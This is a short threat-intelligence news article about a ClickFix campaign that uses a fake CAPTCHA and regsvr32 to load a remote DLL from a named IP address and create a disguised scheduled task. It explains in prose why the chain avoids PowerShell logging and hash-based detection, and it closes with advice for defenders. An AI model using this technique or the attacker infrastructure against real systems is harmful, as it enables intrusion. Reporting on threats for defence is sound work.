New ClickFix Attack Hides in Native Windows Tools to Reduce Detection Risk

The ClickFix method has matured from simple phishing lures to sophisticated abuse of Windows "living‑off‑the‑land" binaries (LOLBins). By embedding malicious commands in a seemingly innocuous CAPTCHA dialog, threat actors capitalize on user trust and the built‑in legitimacy of utilities like cmdkey and regsvr32. This shift reflects a broader trend where attackers sidestep traditional detection signatures, opting for native tools that blend into normal system activity.

In this April 2026 campaign, the malicious command initiates a UNC connection to 151.245.195.142, pulls a 64‑bit DLL named demo.dll, and invokes DllRegisterServer to spawn a hidden CreateProcessA call. The DLL then creates a scheduled task—RunNotepadNow—using an XML payload hosted remotely. Because the task definition is not stored locally, defenders cannot rely on static file hashes, and the task’s benign name further obscures its malicious intent. The use of regsvr32 to load the DLL sidesteps PowerShell logging, making behavioral analytics more challenging.

For security teams, the key takeaway is the necessity of monitoring LOLBin activity and scrutinizing anomalous Run dialog inputs. Endpoint detection platforms should flag unusual cmdkey or regsvr32 invocations, especially those combined with network calls to unknown IPs. User education remains critical: employees must be instructed never to paste code from unverified sources into the Run box. As attackers continue to weaponize native Windows components, a layered defense—combining technical controls with awareness training—will be essential to mitigate this evolving threat vector.